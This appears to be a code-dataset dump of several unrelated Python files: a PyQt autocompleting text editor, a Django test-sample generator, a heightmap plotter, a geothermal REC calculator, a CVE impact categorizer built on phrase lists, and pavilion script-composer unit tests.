text stringlengths 957 885k |
|---|
<reponame>gulshalla/shalla-text-editor<filename>extensions/custom_text_edit.py
import sys
from PyQt5 import QtWidgets, QtPrintSupport, QtGui, QtCore
from PyQt5.QtCore import Qt
class MyTextEdit(QtWidgets.QTextEdit):
    """Text edit with trie-backed word completion.

    Ctrl+Space pops up a completion list for the word under the cursor;
    Ctrl+E completes inline with the current best suggestion.  Every word
    the user finishes typing (terminated by a space) is inserted into the
    parent widget's ``local_trie`` so it becomes a future suggestion.
    """

    def __init__(self, parent=None):
        # BUG FIX: the original called QtWidgets.QLineEdit.__init__ on this
        # QTextEdit subclass; initialise the correct base class instead.
        QtWidgets.QTextEdit.__init__(self, parent)
        font = QtGui.QFont()
        font.setPointSize(12)
        self.setFont(font)
        # NOTE: shadows QWidget.parent(); kept because keyPressEvent reads
        # self.parent.local_trie from the owning widget.
        self.parent = parent
        self.completer = None
        # Letters of the word currently being typed (committed to the trie
        # when the user presses space).
        self.prev_word = []

    def setCompleter(self, completer):
        """Install *completer*, disconnecting any previously installed one."""
        if self.completer:
            self.completer.insertText.disconnect()
        if not completer:
            return
        completer.setWidget(self)
        completer.setCompletionMode(QtWidgets.QCompleter.PopupCompletion)
        completer.setCaseSensitivity(QtCore.Qt.CaseInsensitive)
        self.completer = completer
        self.completer.insertText.connect(self.insertCompletion)

    def insertCompletion(self, completion):
        """Insert the part of *completion* beyond the already-typed prefix."""
        tc = self.textCursor()
        extra = (len(completion) -
                 len(self.completer.completionPrefix()))
        tc.movePosition(QtGui.QTextCursor.Left)
        tc.movePosition(QtGui.QTextCursor.EndOfWord)
        tc.insertText(completion[-extra:])
        self.setTextCursor(tc)

    def textUnderCursor(self):
        """Return the word currently under the text cursor."""
        tc = self.textCursor()
        tc.select(QtGui.QTextCursor.WordUnderCursor)
        return tc.selectedText()

    def focusInEvent(self, event):
        """Re-attach the completer to this widget whenever focus returns."""
        if self.completer:
            self.completer.setWidget(self)
        QtWidgets.QTextEdit.focusInEvent(self, event)

    def keyPressEvent(self, event):
        """Track typed words and drive popup/inline completion."""
        # Accumulate letters of the word in progress; a space commits the
        # word to the parent's trie, backspace drops the last letter.
        if event.text().isalpha():
            self.prev_word.append(event.text())
        if event.key() == QtCore.Qt.Key_Backspace:
            if self.prev_word:
                self.prev_word.pop()
        if event.text() == ' ':
            self.parent.local_trie.insert(''.join(self.prev_word))
            self.prev_word = []
        # While the popup is open, let it consume the accept/navigation keys.
        if self.completer and self.completer.popup() and self.completer.popup().isVisible():
            if event.key() in (
                    QtCore.Qt.Key_Enter,
                    QtCore.Qt.Key_Return,
                    QtCore.Qt.Key_Escape,
                    QtCore.Qt.Key_Tab,
                    QtCore.Qt.Key_Backtab,
                    QtCore.Qt.Key_Space):
                event.ignore()
                return
        # Ctrl+Space -> popup completion, Ctrl+E -> inline completion.
        isShortcut = (event.modifiers() == QtCore.Qt.ControlModifier and event.key() == QtCore.Qt.Key_Space)
        inline = (event.modifiers() == QtCore.Qt.ControlModifier and event.key() == QtCore.Qt.Key_E)
        if inline or isShortcut:
            # Build a fresh completer from the trie's matches for the prefix.
            words = self.parent.local_trie.get_words(self.textUnderCursor())
            completer_new = MyDictionaryCompleter(words)
            self.setCompleter(completer_new)
        if inline:
            # Inline mode: insert the current best suggestion directly,
            # then restore popup mode for subsequent completions.
            self.completer.setCompletionMode(QtWidgets.QCompleter.InlineCompletion)
            completionPrefix = self.textUnderCursor()
            if (completionPrefix != self.completer.completionPrefix()):
                self.completer.setCompletionPrefix(completionPrefix)
            self.completer.complete()
            self.completer.insertText.emit(self.completer.currentCompletion())
            self.completer.setCompletionMode(QtWidgets.QCompleter.PopupCompletion)
            return
        QtWidgets.QTextEdit.keyPressEvent(self, event)
        ctrlOrShift = event.modifiers() in (QtCore.Qt.ControlModifier, QtCore.Qt.ShiftModifier)
        if ctrlOrShift and event.text() == '':
            # Bare Ctrl/Shift press: nothing more to do.
            return
        completionPrefix = self.textUnderCursor()
        if not isShortcut:
            # Any ordinary keystroke dismisses a stale popup.
            # BUG FIX: guard against self.completer being None (it is None
            # until the first Ctrl+Space/Ctrl+E builds one).
            if self.completer and self.completer.popup():
                self.completer.popup().hide()
            return
        # Ctrl+Space: show the popup anchored at the cursor.
        self.completer.setCompletionPrefix(completionPrefix)
        popup = self.completer.popup()
        popup.setCurrentIndex(
            self.completer.completionModel().index(0, 0))
        cr = self.cursorRect()
        cr.setWidth(self.completer.popup().sizeHintForColumn(0)
                    + self.completer.popup().verticalScrollBar().sizeHint().width())
        self.completer.complete(cr)  # pop it up!
class MyDictionaryCompleter(QtWidgets.QCompleter):
    """QCompleter that re-emits each chosen completion via ``insertText``."""

    # Emitted with the cleaned-up completion text when an item is activated.
    insertText = QtCore.pyqtSignal(str)

    def __init__(self, myKeywords=None):
        QtWidgets.QCompleter.__init__(self, myKeywords)
        self.activated.connect(self.changeCompletion)

    def changeCompletion(self, completion):
        """Drop any trailing "(...)" part, then forward the completion."""
        paren_at = completion.find("(")
        if paren_at != -1:
            completion = completion[:paren_at]
        self.insertText.emit(completion)
|
<reponame>JenkoB/resolwe-bio
""".. Ignore pydocstyle D400.
================
Generate Samples
================
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import csv
import gzip
import json
import logging
import os
import random
import shutil
import string
import zipfile
import datetime
from django.core.management.base import BaseCommand
from django.conf import settings
from django.utils import timezone
from resolwe.flow.models import Data, Storage
from resolwe.utils import BraceMessage as __
from resolwe_bio.models import Sample
from .utils import (get_descriptorschema, get_process, get_superuser,
generate_sample_desciptor, generate_reads_descriptor)
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
class Command(BaseCommand):
    """Generate test data (samples/presamples with reads, BAM and expressions)."""

    help = "Generate test data"

    def add_arguments(self, parser):
        """Command arguments."""
        parser.add_argument('-s', '--n-samples', type=int, default=15,
                            help="Number of samples to generate (default: %(default)s)")
        parser.add_argument('-p', '--n-presamples', type=int, default=5,
                            help="Number of presamples to generate (default: %(default)s)")
        parser.add_argument('--rseed', action='store_true', help="Use fixed random seed")

    @staticmethod
    def get_random_word(length):
        """Generate a random lowercase word of *length* letters."""
        return ''.join(random.choice(string.ascii_lowercase) for _ in range(length))

    def set_name(self):
        """Return a random sample name; its prefix encodes the organism."""
        organism = random.choice(['Dictyostelium discoideum', 'Mus musculus', 'Homo sapiens'])
        replicate = random.choice(['rep1', 'rep2', 'rep3', 'rep4', 'rep5'])
        hour = random.choice(range(36))
        kit = random.choice(['RiboZero', 'Nugen'])
        group = random.choice(['treatment', 'control'])
        if organism == 'Dictyostelium discoideum':
            return 'Dd_{}_{}_hr_{}'.format(kit, replicate, hour)
        if organism == 'Mus musculus':
            return 'Mm_{}_{}_{}'.format(self.get_random_word(3), group, replicate)
        if organism == 'Homo sapiens':
            return 'Hs_{}_{}_{}'.format(self.get_random_word(3), group, replicate)

    def set_source(self, species):
        """Return the Gene ID source matching the species prefix of *species*."""
        if species.startswith('Dd'):
            return 'DICTYBASE'
        if species.startswith('Mm'):
            return 'UCSC'
        if species.startswith('Hs'):
            return 'UCSC'

    @staticmethod
    def generate_expressions(gene_ids, path):
        """Generate random expression data.

        Writes ``expressions.tab.gz`` (Gene/Expression table) and
        ``expressions.json`` into *path*, using the gzipped gene list at
        *gene_ids* as the gene universe.
        """
        genes = {}
        with gzip.open(os.path.join(path, 'expressions.tab.gz'), mode='wt') as f:
            # NOTE: Default line terminator is '\r\n'
            # NOTE: Python2's csv module doesn't accept a unicode string for delimeter
            csvwriter = csv.writer(f, delimiter=str('\t'), lineterminator='\n')
            csvwriter.writerow(('Gene', 'Expression'))
            # BUG FIX: don't shadow the gene_ids parameter with the handle.
            with gzip.open(gene_ids, mode='rt') as gene_file:
                all_genes = [line.strip() for line in gene_file]
            for gene in all_genes:
                expression = round(random.gammavariate(1, 100), 2)
                csvwriter.writerow((gene, expression))
                genes[gene] = expression
        with open(os.path.join(path, 'expressions.json'), 'w') as json_file:
            json.dump({'genes': genes}, json_file, indent=4, sort_keys=True)

    def create_data(self, reads_name='seq_reads', annotated=False, rseed=None):
        """Generate one sample: reads (+FastQC), BAM mapping and expressions.

        :param reads_name: basename of the fastq/fastqc test fixtures to use
        :param annotated: when True, annotate the sample and clear its
            presample flag
        :param rseed: unused; kept for interface compatibility
        """
        # get test data paths
        data_dir = settings.FLOW_EXECUTOR['DATA_DIR']
        test_files_path = os.path.abspath(
            os.path.join(os.path.dirname(__file__), '..', '..', 'tests', 'files'))
        reads = os.path.join(test_files_path, reads_name + '.fastq.gz')
        fastqc = os.path.join(test_files_path, reads_name + '_fastqc.zip')
        bam_mapping = os.path.join(test_files_path, 'alignment_position_sorted.bam')
        bai = os.path.join(test_files_path, 'alignment_position_sorted.bam.bai')
        dicty_genes = os.path.join(test_files_path, 'dicty_genes.tab.gz')
        human_genes = os.path.join(test_files_path, 'human_genes.tab.gz')
        mouse_genes = os.path.join(test_files_path, 'mouse_genes.tab.gz')
        # Create reads data object
        started = timezone.now()
        data_name = self.set_name()
        d = Data.objects.create(
            slug='gs-reads',
            name=data_name,
            started=started,
            finished=started + datetime.timedelta(minutes=45),
            descriptor_schema=get_descriptorschema('reads'),
            descriptor=generate_reads_descriptor(data_name, presample=True),
            status=Data.STATUS_PROCESSING,
            process=get_process('upload-fastq-single'),
            contributor=get_superuser(),
            input={'src': [{'file': os.path.basename(reads)}]})
        # Create data directory and copy reads files into it
        os.mkdir(os.path.join(data_dir, str(d.id)))
        shutil.copy(reads, os.path.join(data_dir, str(d.id)))
        # Attach FastQC data to reads file
        os.mkdir(os.path.join(data_dir, str(d.id), 'fastqc'))
        shutil.copy(fastqc, os.path.join(data_dir, str(d.id)))
        with zipfile.ZipFile(fastqc) as f:
            f.extractall(os.path.join(data_dir, str(d.id), 'fastqc'))
        d.output = {
            'fastq': [{'file': os.path.basename(reads)}],
            'fastqc_url': [{
                'file': 'fastqc/{}_fastqc/fastqc_report.html'.format(reads_name),
                'refs': ['fastqc/{}_fastqc'.format(reads_name)]}],
            'fastqc_archive': [{'file': '{}_fastqc.zip'.format(reads_name)}]}
        d.status = Data.STATUS_DONE
        d.save()
        # Create stdout file
        with open(os.path.join(data_dir, str(d.id), 'stdout.txt'), 'w') as stdout:
            stdout.write('Upload NGS reads. Sample was created with the generate_samples django-admin command.')
        # Get sample collection (auto-created when the reads Data was saved)
        sample = Sample.objects.filter(data=d)[0]
        # Upload bam file
        bam = Data.objects.create(
            name='Mapping',
            started=started,
            finished=started + datetime.timedelta(minutes=50),
            process=get_process('upload-bam-indexed'),
            contributor=get_superuser(),
            status=Data.STATUS_PROCESSING,
            input={
                'src': {'file': 'alignment_position_sorted.bam'},
                'src2': {'file': 'alignment_position_sorted.bam.bai'}})
        os.mkdir(os.path.join(data_dir, str(bam.id)))
        shutil.copy(bam_mapping, os.path.join(data_dir, str(bam.id)))
        shutil.copy(bai, os.path.join(data_dir, str(bam.id)))
        bam.output = {
            'bam': {'file': 'alignment_position_sorted.bam'},
            'bai': {'file': 'alignment_position_sorted.bam.bai'}}
        bam.status = Data.STATUS_DONE
        bam.save()
        with open(os.path.join(data_dir, str(bam.id), 'stdout.txt'), 'w') as stdout:
            stdout.write('Upload BAM and BAM index (BAI) files. Sample '
                         'was created with the generate_samples django-admin command.')
        # Re-home the BAM into the reads' sample (drop its auto-created one).
        Sample.objects.filter(data=bam).delete()
        sample.data.add(bam)
        # Create expressions
        exp = Data.objects.create(
            name='Expression',
            process=get_process(slug='upload-expression'),
            contributor=get_superuser(),
            started=started,
            finished=started + datetime.timedelta(minutes=60),
            status=Data.STATUS_PROCESSING,
            input={'exp': {'file': 'expressions.tab.gz'},
                   'exp_type': 'FPKM',
                   'exp_name': 'Expression',
                   'source': self.set_source(d.name)})
        os.mkdir(os.path.join(data_dir, str(exp.id)))
        # Gene universe depends on the organism encoded in the sample name.
        if d.name.startswith('Dd'):
            self.generate_expressions(dicty_genes, os.path.join(data_dir, str(exp.id)))
        if d.name.startswith('Hs'):
            self.generate_expressions(human_genes, os.path.join(data_dir, str(exp.id)))
        if d.name.startswith('Mm'):
            self.generate_expressions(mouse_genes, os.path.join(data_dir, str(exp.id)))
        # BUG FIX: close the expressions.json file handle (was a bare open()).
        with open(os.path.join(data_dir, str(exp.id), 'expressions.json')) as json_file:
            expressions_json = json.load(json_file)
        json_object = Storage.objects.create(
            json=expressions_json,
            contributor=get_superuser(),
            name='{}_storage'.format(exp.name),
            data=exp)
        exp.output = {
            'exp': {'file': 'expressions.tab.gz'},
            'exp_type': 'FPKM',
            'exp_json': json_object.id,
            'source': self.set_source(d.name)
        }
        exp.status = Data.STATUS_DONE
        exp.save()
        Sample.objects.filter(data=exp).delete()
        sample.data.add(exp)
        with open(os.path.join(data_dir, str(exp.id), 'stdout.txt'), 'w') as stdout:
            stdout.write('Upload gene expressions. Sample was created '
                         'with the generate_samples django-admin command.')
        # Annotate Sample Collection
        if annotated:
            sample.descriptor = generate_sample_desciptor(d.name)
            sample.presample = False
            sample.save()
            d.descriptor = generate_reads_descriptor(data_name, presample=False)
            d.save()
            logger.info(__('Created sample: {} (id={})', sample.name, sample.id))
        else:
            logger.info(__('Created presample: {} (id={})', sample.name, sample.id))

    def handle(self, *args, **options):
        """Command handle."""
        if options['rseed']:
            random.seed(42)
        for _ in range(options['n_samples']):
            self.create_data(annotated=True)
        for _ in range(options['n_presamples']):
            self.create_data(annotated=False)
|
<gh_stars>1-10
# -*- encoding: utf-8 -*-
#
# heightmap.py
#
# Copyright 2017 <NAME> <<EMAIL>>
#
# This program is the property of Anasys Instruments, and may not be
# redistributed or modified without explicit permission of the author.
import xml.etree.ElementTree as ET
import numpy as np
import matplotlib
matplotlib.use("TkAgg") #Keeps tk from crashing on final dialog open
import matplotlib.pyplot as plt
import tkinter as tk
from tkinter import filedialog
from . import anasysfile
class HeightMap(anasysfile.AnasysElement):
    """A data structure for holding HeightMap data"""

    def __init__(self, heightmap):
        # Hooks consumed by AnasysElement's generic read/write machinery.
        self._iterable_write = {}
        self._special_write = {'Tags': self._write_tags}
        self._skip_on_write = []
        self._special_read = {'Tags': self._read_tags}
        anasysfile.AnasysElement.__init__(self, etree=heightmap)
        # Rearrange flat sample data into a Resolution.X x Resolution.Y grid.
        self.SampleBase64 = self.SampleBase64.reshape(int(self.Resolution.X), int(self.Resolution.Y))

    def _write_tags(self, elem, nom, tags):
        """Serialize *tags* back into <Tag Name=... Value=...> child elements."""
        new_elem = ET.SubElement(elem, nom)
        for k, v in tags.items():
            tag = ET.SubElement(new_elem, "Tag")
            tag.set("Name", k)
            tag.set("Value", v)

    def _read_tags(self, element):
        """Turn the <Tags> element into a flat {name: value} dict."""
        tag_dict = {}
        for tag in list(element):
            tag_dict[tag.get('Name')] = tag.get('Value')
        return tag_dict

    def _plot(self, **kwargs):
        """Generates a pyplot image of height map for saving or viewing"""
        axes = [0, float(self.Size.X), 0, float(self.Size.Y)]
        # Set color bar range to [-y, +y] where y is abs(max(minval, maxval))
        # rounded up to the nearest 5, unless an explicit ZMax is stored.
        if self.ZMax == 'INF':
            _max = np.absolute(self.SampleBase64).max()
            rmax = (_max // 5) * 5 + 5
        else:
            rmax = float(self.ZMax) / 2
        imshow_args = {'cmap': 'gray', 'interpolation': 'none', 'extent': axes, 'vmin': -rmax, 'vmax': rmax}
        imshow_args.update(kwargs)
        # 'style' is our own flag, not an imshow option -- pop it first.
        if "style" in imshow_args.keys():
            plt.style.use(imshow_args.pop("style"))
        # Clear and display height image
        plt.gcf().clear()
        plt.imshow(self.SampleBase64, **imshow_args)
        # Axis labels are in microns
        plt.xlabel('μm')
        plt.ylabel('μm')
        # Adds color bar with units displayed
        units = self.Units
        if self.UnitPrefix != {}:
            units = self.UnitPrefix + self.Units
        plt.colorbar().set_label(units)
        # Set window title
        plt.gcf().canvas.set_window_title(self.Label)
        return plt

    def show(self, **kwargs):
        """
        Opens an mpl gui window with image data. Options are documented:
        https://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.imshow
        Style can be specified with 'style' flag. Options:
        pyplot.style.options:
        https://tonysyu.github.io/raw_content/matplotlib-style-gallery/gallery.html
        """
        if isinstance(self.SampleBase64, dict):
            # Don't do anything if there is no image data
            print("Error: No image data in HeightMap object")
            return
        # Do all the plotting, then display the image
        img = self._plot(**kwargs)
        img.show()

    def savefig(self, fname='', **kwargs):
        """
        Gets the plot from self._plot(), then saves. Options are documented:
        https://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.savefig
        """
        if isinstance(self.SampleBase64, dict):
            # Don't do anything if there is no image data
            print("Error: No image data in HeightMap object")
            return
        # Do all the plotting (kwargs are forwarded to savefig below only,
        # matching the original behaviour)
        self._plot()
        # File types for save
        ftypes = (("Portable Network Graphics (*.png)", "*.png"),
                  ("Portable Document Format(*.pdf)", "*.pdf"),
                  ("Encapsulated Postscript (*.eps)", "*.eps"),
                  # BUG FIX: this entry mapped the *.ps label to "*.pdf"
                  ("Postscript (*.ps)", "*.ps"),
                  ("Raw RGBA Bitmap (*.raw;*.rgba)", "*.raw;*.rgba"),
                  ("Scalable Vector Graphics (*.svg;*.svgz)", "*.svg;*.svgz"),
                  ("All files", "*.*"))
        # Test for presence of filename and get one if needed
        if fname == '':
            fname = tk.filedialog.asksaveasfilename(filetypes=ftypes, defaultextension=".png", initialfile="HeightMap.png")
        if fname == '':
            print("ERROR: User failed to provide filename. Abort save command.")
            return
        # If they made it this far, save (fname given)
        plt.savefig(fname, **kwargs)
|
<filename>analysis/geoexchange_proxies.py
import admin_tools.db_reader as db_reader
import datetime
import pandas as pd
def C_to_F(C):
    """Convert Celsius to Fahrenheit (scalar or pandas Series)."""
    F = (9. / 5) * C + 32.
    return F


def rec_calc_prep(df):
    """Prepare raw sensor rows for REC calculation.

    Adds Fahrenheit water temperatures ('ewt', 'lwt'), their difference
    ('delT'), filters to rows that represent a valid heating run, and adds
    the measured heat in MWh ('heat_MWh').

    :param df: DataFrame with 'ewt_1'/'lwt_1' (Celsius), 'compressor_1' (W),
        'q_1_device' (flow) and 'time_elapsed' (hours) columns; mutated in
        place with the derived temperature columns.
    :return: filtered copy with the 'heat_MWh' column added
    """
    df.loc[:, 'ewt'] = C_to_F(df.loc[:, 'ewt_1'])
    df.loc[:, 'lwt'] = C_to_F(df.loc[:, 'lwt_1'])
    df.loc[:, 'delT'] = df.loc[:, 'ewt'] - df.loc[:, 'lwt']
    # BUG FIX: the filters below referenced the global name `data` instead of
    # the `df` parameter (NameError outside the __main__ script).
    data_heating = df.loc[df.delT > 1]          # heat actually extracted
    data_running = data_heating[data_heating.compressor_1 > 500]   # compressor on
    # .copy() so the heat_MWh assignment is on an owned frame (no
    # SettingWithCopyWarning); values are unchanged.
    data_final = data_running[data_running.time_elapsed < 0.08333].copy()
    # 500 * delT * flow * hours * 2.93E-07 (BTU -> MWh conversion factor)
    data_final.loc[:, 'heat_MWh'] = (500 * data_final.loc[:, 'delT']
                                     * data_final.loc[:, 'q_1_device']
                                     * data_final.loc[:, 'time_elapsed']
                                     * 2.93E-07)
    return data_final
def ma_thermal_recs(data, ma_hp_params):
    """Massachusetts thermal REC proxy: renewable heat in MWh per row.

    Adds 'COPewt' (quadratic COP fit in entering water temperature) and 'kW'
    (net electrical input) columns to *data* in place, and returns a new
    DataFrame with an 'RH' column in MWh.
    """
    a, b, c = ma_hp_params['COP-ewt'][:3]
    ewt = data.loc[:, 'ewt']
    # Table look-up of COP based on EWT (quadratic fit coefficients a, b, c).
    data.loc[:, 'COPewt'] = a * ewt * ewt + b * ewt + c
    # Net electrical input: biased compressor draw minus circulator pump.
    data.loc[:, 'kW'] = data.loc[:, 'compressor_1'] / 1000. * ma_hp_params['kw_bias'] - ma_hp_params['circ-pump-kw']
    data_ma = pd.DataFrame()
    data_ma.loc[:, 'RH'] = (data.loc[:, 'COPewt'] - 1) * data.loc[:, 'kW'] * data.loc[:, 'time_elapsed']
    # Convert kWh -> MWh.
    return data_ma / 1000.
def nh_thermal_recs(data, heatpump_AHRI):
    """New Hampshire thermal REC proxy based on AHRI-rated performance.

    Returns a new DataFrame with an 'nh_rec' column: per-row renewable heat
    in MWh, computed from elapsed run time, the part-load heating capacity
    and the renewable fraction (COP - 1) / COP.
    """
    cop = heatpump_AHRI['cop']
    data_nh = pd.DataFrame()
    data_nh.loc[:, 'nh_rec'] = (data.loc[:, 'time_elapsed']
                                * heatpump_AHRI['hc_part_load'] * (cop - 1.) / cop)
    # Convert BTU -> MWh.
    return data_nh * 2.93E-07
if __name__ == '__main__':
    # Install ids to process; value is a heat-pump UUID ('none' when unused).
    installs = {'1649': 'none'}
    start = datetime.datetime(2016, 1, 1)
    stop = datetime.datetime(2016, 12, 31)
    # Hardwired for specific heat pump
    nh_heatpump_AHRI = {'install_id': '1649', 'model': 'HXT036', 'cop': 4.9, 'hc_part_load': 22600, 'hc_full_load': 28600}
    #nh_heatpump_AHRI = {'install_id': '45', 'model': 'HXT048', 'cop': 4.3, 'hc_part_load': 29700, 'hc_full_load':33700}
    # nh_heatpump_AHRI = {'install_id': '1674', 'model': 'NDH038', 'cop': 4.8, 'hc_part_load': 22900, 'hc_full_load': 28500}
    #nh_heatpump_AHRI = {'install_id': '1660', 'model': 'NDV072', 'cop': 3.9, 'hc_part_load': 47400, 'hc_full_load': 55400}
    ma_hp_parameters = {'install_id': '1649', 'COP-ewt': [-0.0013, 0.1361, 0.619], 'circ-pump-kw': 0.2, 'kw_bias': 1.15}
    #ma_hp_parameters = {'install_id': '45', 'COP-ewt': [-0.0003, 0.0758, 1.498] , 'circ-pump-kw': 0.4, 'kw_bias': 1.00}
    # ma_hp_parameters = {'install_id': '1674', 'COP-ewt': [0.00, 0.05, 2.2], 'circ-pump-kw': 0.2, 'kw_bias': 1.00}
    #ma_hp_parameters = {'install_id': '1660', 'COP-ewt': [0.0003, 0.0154, 2.586], 'circ-pump-kw': 0.0, 'kw_bias': 1.15}
    db_columns = 'ewt_1, lwt_1, compressor_1, created, q_1_device, auxiliary_1, time_elapsed'
    for install, hp_uuid in installs.items():
        print('Working on ..geoexchange proxies.. ', install)
        # Pull raw sensor rows for the window, then derive REC proxies.
        data = db_reader.get_fr_as_dataframe(install, start, stop, db_columns)
        data.sort_values('created', inplace=True)
        df = rec_calc_prep(data)
        nh_recs = nh_thermal_recs(df, nh_heatpump_AHRI)
        ma_recs = ma_thermal_recs(df, ma_hp_parameters)
        # NOTE(review): results is built but never printed or persisted.
        results = {'NH RECs': nh_recs.sum(),
                   'MA AECs': ma_recs.sum(),
                   'Measured': df.heat_MWh.sum()}
# NOTE(review): second __main__ guard -- these assignments run after the loop
# above and are otherwise unused; looks like leftover scratch code to verify.
if __name__ == '__main__':
    installation_id = 'GES649'
    start_date = '2015-01-01'
    end_date = '2016-01-01'
    start = datetime.datetime(2016, 1, 1)
    stop = datetime.datetime(2016, 12, 30)
"""
Module contains functionality that determines whether a vulnerability
causes remote code execution.
"""
from cve_connector.nvd_cve.categorization.helpers import test_incidence
def has_code_execution_as_root(description, cvssv2, cvssv3):
    """
    Function determines whether CVE has "Arbitrary code execution as
    root/administrator/system" as its impact.
    :param description: description of CVE
    :param cvssv2: CVSS version 2 of CVE
    :param cvssv3: CVSS version 3 of CVE
    :return: True if CVE has "Arbitrary code execution as
    root/administrator/system" as its impact
    """
    # Phrases that directly indicate code execution with root/SYSTEM rights.
    # Matched case-sensitively against the raw description.
    necessary_condition = [
        "execute arbitrary code as root",
        "execute arbitrary code with root privileges",
        "execute arbitrary code as the root user",
        "execute arbitrary code as a root user",
        "execute arbitrary code as LocalSystem",
        "execute arbitrary code as SYSTEM",
        # BUG FIX: a missing trailing comma after the next entry used to
        # concatenate it with the following phrase, silently losing both.
        "execute arbitrary code as Local System",
        "execute arbitrary code with SYSTEM privileges",
        "execute arbitrary code with LocalSystem privileges",
        "execute dangerous commands as root",
        "execute shell commands as the root user",
        "execute arbitrary commands as root",
        "execute arbitrary commands with root privileges",
        "execute arbitrary commands with root-level privileges",
        "execute commands as root",
        "execute root commands",
        "execute arbitrary os commands as root",
        "execute arbitrary shell commands as root",
        "execute arbitrary commands as SYSTEM",
        "execute arbitrary commands with SYSTEM privileges",
        "run commands as root",
        "run arbitrary commands as root",
        "run arbitrary commands as the root user",
        "execute code with root privileges",
        "load malicious firmware",
        "succeed in uploading malicious Firmware",
        "executed under the SYSTEM account"
    ]
    # (A duplicate "run commands as root" entry was removed; no behavior change.)
    for phrase in necessary_condition:
        if phrase in description:
            return True
    # Fallback: user-level code execution combined with a complete CVSSv2
    # confidentiality/integrity/availability impact counts as root-level.
    return has_code_execution_as_user(description.lower(),
                                      cvssv3) and \
        (cvssv2['c'] == "COMPLETE") and \
        (cvssv2['i'] == "COMPLETE") and \
        (cvssv2['a'] == "COMPLETE")
def has_code_execution_as_user(description, cvssv3):
    """
    Decide whether a CVE's impact is "Arbitrary code execution as user of
    application".
    :param description: description of CVE
    :param cvssv3: CVSS version 3 of CVE
    :return: True if CVE has "Arbitrary code execution as user of application"
    as its impact.
    """
    # A single direct phrase match is sufficient on its own.
    impact_phrases = (
        "include and execute arbitrary local php files",
        "execute arbitrary code",
        "command injection",
        "execute files",
        "run arbitrary code",
        "execute a malicious file",
        "execution of arbitrary code",
        "remote execution of arbitrary php code",
        "execute code",
        "code injection vulnerability",
        "execute any code",
        "malicious file could be then executed on the affected system",
        "inject arbitrary commands",
        "execute arbitrary files",
        "inject arbitrary sql code",
        "run the setuid executable",
        "vbscript injection",
        "execute administrative operations",
        "performs arbitrary actions",
        "submit arbitrary requests to an affected device",
        "perform arbitrary actions on an affected device",
        "executes an arbitrary program",
        "attacker can upload a malicious payload",
        "execute malicious code",
        "modify sql commands to the portal server",
        "execute arbitrary os commands",
        "execute arbitrary code with administrator privileges",
        "execute administrator commands",
        "executed with administrator privileges",
        "remote procedure calls on the affected system",
        "run a specially crafted application on a targeted system",
        "execute arbitrary code in a privileged context",
        "execute arbitrary code with super-user privileges",
        "run processes in an elevated context",
    )
    if any(phrase in description for phrase in impact_phrases):
        return True
    # A (non-blind) SQL injection that compromises both integrity and
    # confidentiality also counts.
    if ("sql injection" in description
            and cvssv3['i'] == "HIGH"
            and cvssv3['c'] == "HIGH"
            and "blind sql injection" not in description):
        return True
    # Last resort: a generic execution/injection verb combined with a
    # code/command noun.
    action_verbs = [
        " execut",
        " run ",
        ' inject'
    ]
    action_nouns = [
        " code ",
        " command",
        "arbitrary script",
        " code."
    ]
    return bool(test_incidence(description, action_nouns) and
                test_incidence(description, action_verbs))
|
<filename>test/tests/scriptComposer_tests.py
import grp, os, pwd, stat, sys, unittest
from pathlib import Path
from collections import OrderedDict
from pavilion import scriptcomposer
from pavilion.unittest import PavTestCase
from pavilion import utils
class TestScriptWriter(PavTestCase):
    """Tests for pavilion's scriptcomposer module."""

    # Script some tests may write; removed in setUp so each run starts clean.
    script_path = 'testName.batch'

    def setUp(self):
        """Set up for the ScriptComposer tests."""
        if os.path.exists(self.script_path):
            os.remove(self.script_path)

    def _other_group(self):
        """Find a group other than the user's default group to use when creating files.
        :returns: The name of the found group."""
        for gid in os.getgroups():
            if gid == os.getgid():
                # This is the user's default.
                continue
            return grp.getgrgid(gid).gr_name
        raise RuntimeError("Could not find suitable group for use in test.")

    def test_header(self):
        """Test for the ScriptHeader class."""
        header = scriptcomposer.ScriptHeader(
            shebang="#!/bin/sh",
            scheduler_headers=[
                '# FOO',
                '# BAR',
            ]
        )
        # get_lines() should emit the shebang followed by the raw headers.
        self.assertEqual(header.get_lines(),
                         ['#!/bin/sh',
                          '# FOO',
                          '# BAR'])

    def test_scriptComposer(self):
        """Testing ScriptComposer class variable setting."""
        # Testing valid uses.
        # Testing initialization defaults.
        composer = scriptcomposer.ScriptComposer()
        self.assertEqual(composer.header.shebang, '#!/bin/bash')
        self.assertEqual(composer.header.scheduler_headers, [])
        # Testing individual assignment
        test_header_shell = "/usr/env/python"
        test_header_scheduler = OrderedDict()
        test_header_scheduler['-G'] = 'pam'
        test_header_scheduler['-N'] = 'fam'
        # NOTE(review): these two calls add body content that is never
        # asserted on below -- presumably just exercising the API.
        composer.newline()
        composer.command(['taco', 'burrito', 'nachos'])
        # NOTE(review): the three test_details_* values are unused.
        test_details_path = 'testPath'
        test_details_group = 'groupies'
        test_details_perms = 0o543
        composer.header.shebang = test_header_shell
        composer.header.scheduler_headers = test_header_scheduler
        self.assertEqual(composer.header.shebang, test_header_shell)
        self.assertEqual(composer.header.scheduler_headers,
                         test_header_scheduler)
        # A fresh composer should be back to the defaults.
        composer = scriptcomposer.ScriptComposer()
        self.assertEqual(composer.header.shebang, '#!/bin/bash')
        self.assertEqual(composer.header.scheduler_headers, [])
        # Testing object assignment.
        header = scriptcomposer.ScriptHeader(
            shebang=test_header_shell,
            scheduler_headers=test_header_scheduler)
        composer.header = header
        self.assertEqual(composer.header.shebang, test_header_shell)
        self.assertEqual(composer.header.scheduler_headers,
                         test_header_scheduler)

    def test_writeScript(self):
        """Testing the writeScript function of the ScriptComposer class."""
        testHeaderShell = "/usr/env/python"
        testHeaderScheduler = ['-G pam', '-N fam']
        path = self.pav_cfg.working_dir/'testPath'
        testComposer = scriptcomposer.ScriptComposer()
        testComposer.header.shebang = testHeaderShell
        testComposer.header.scheduler_headers = testHeaderScheduler
        testComposer.write(path)
        self.assertTrue(path.exists())
        with path.open() as testFile:
            testLines = testFile.readlines()
        for i in range(0, len(testLines)):
            testLines[i] = testLines[i].strip()
        # Shebang, two scheduler headers, then two blank separator lines.
        self.assertEqual(testLines[0], "#!/usr/env/python")
        self.assertEqual(testLines[1], "# -G pam")
        self.assertEqual(testLines[2], "# -N fam")
        self.assertEqual(testLines[3], "")
        self.assertEqual(testLines[4], "")
